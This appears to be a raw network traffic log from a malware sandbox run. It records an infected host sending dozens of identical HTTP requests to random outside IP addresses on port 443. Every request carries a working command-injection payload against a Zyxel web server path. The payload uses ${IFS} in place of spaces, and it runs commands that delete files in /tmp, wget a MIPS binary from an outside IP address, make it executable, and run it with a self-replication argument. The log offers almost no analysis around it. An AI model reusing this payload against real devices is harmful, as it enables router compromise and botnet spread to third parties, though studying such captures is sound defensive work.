                                      Jan 19, 2024 17:28:54.327856064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      275192.168.2.1441178201.48.54.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327883005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      276192.168.2.143984885.36.18.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327914000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      277192.168.2.1445124125.46.141.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327959061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      278192.168.2.1443566125.251.144.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327965975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      279192.168.2.1445376149.241.13.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328001022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      280192.168.2.14526169.68.183.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328043938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      281192.168.2.1450698169.218.0.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328071117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      282192.168.2.1446270109.179.187.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328107119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      283192.168.2.143309043.116.245.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328145981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      284192.168.2.144623659.76.179.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328186989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      285192.168.2.143440838.183.138.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328213930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      286192.168.2.145184848.237.107.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328248978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      287192.168.2.143351241.69.148.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328299999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      288192.168.2.1457432167.171.205.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328319073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      289192.168.2.1443006107.145.248.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328366041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      290192.168.2.1444618201.206.201.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328377008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      291192.168.2.1460124139.135.1.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328438044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      292192.168.2.143283682.122.208.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328469038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      293192.168.2.144991274.45.122.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328495979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      294192.168.2.1439448190.72.240.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.328536034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      295192.168.2.14528268.56.55.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.331943035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      296192.168.2.145145637.67.244.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.331963062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      297192.168.2.1456922154.194.202.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.331995964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      298192.168.2.144364085.91.122.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.332016945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      299192.168.2.1434642184.140.46.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.332048893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      300192.168.2.1456964117.63.254.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.332091093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      301192.168.2.143831223.52.91.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.332185984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      302192.168.2.14523729.56.189.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:55.332221985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      303192.168.2.1445474125.35.223.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335282087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      304192.168.2.143540069.195.62.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335316896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      305192.168.2.1440728159.115.242.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335346937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      306192.168.2.143865442.186.141.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335375071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      307192.168.2.1447592158.246.62.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335390091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      308192.168.2.145777087.231.158.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335429907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      309192.168.2.145037881.89.153.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335483074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      310192.168.2.1460736160.226.53.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335510015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      311192.168.2.144245282.57.150.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335546970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      312192.168.2.144526420.31.162.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335578918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      313192.168.2.1433486124.11.13.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335614920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      314192.168.2.145897870.90.75.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335623980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      315192.168.2.143494812.219.170.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335643053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      316192.168.2.1451506103.8.102.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335673094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      317192.168.2.1460824115.247.206.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335712910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      318192.168.2.144392878.6.3.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335773945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      319192.168.2.1440506193.55.225.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335773945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      320192.168.2.1460770197.188.170.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335807085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      321192.168.2.1432794151.43.110.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335841894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      322192.168.2.143958866.61.235.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335903883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      323192.168.2.143445658.64.201.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335951090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      324192.168.2.146007870.90.139.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.335989952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      325192.168.2.1451814203.30.187.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.336004019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      326192.168.2.1457404210.205.169.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.336039066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      327192.168.2.145069868.52.6.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:56.336275101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      328192.168.2.143876213.205.106.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339665890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      329192.168.2.146086445.75.166.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339709044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      330192.168.2.1457298177.189.93.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339757919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      331192.168.2.143912843.239.29.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339761972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      332192.168.2.1439532208.24.73.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339786053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      333192.168.2.145916245.187.160.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339812994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      334192.168.2.1449210219.242.183.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339832067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      335192.168.2.144053280.190.9.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339859962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      336192.168.2.145783442.226.248.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339881897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      337192.168.2.145750440.155.140.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:57.339931011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      338192.168.2.1437760191.89.68.61443
                                      TimestampBytes transferredDirectionData
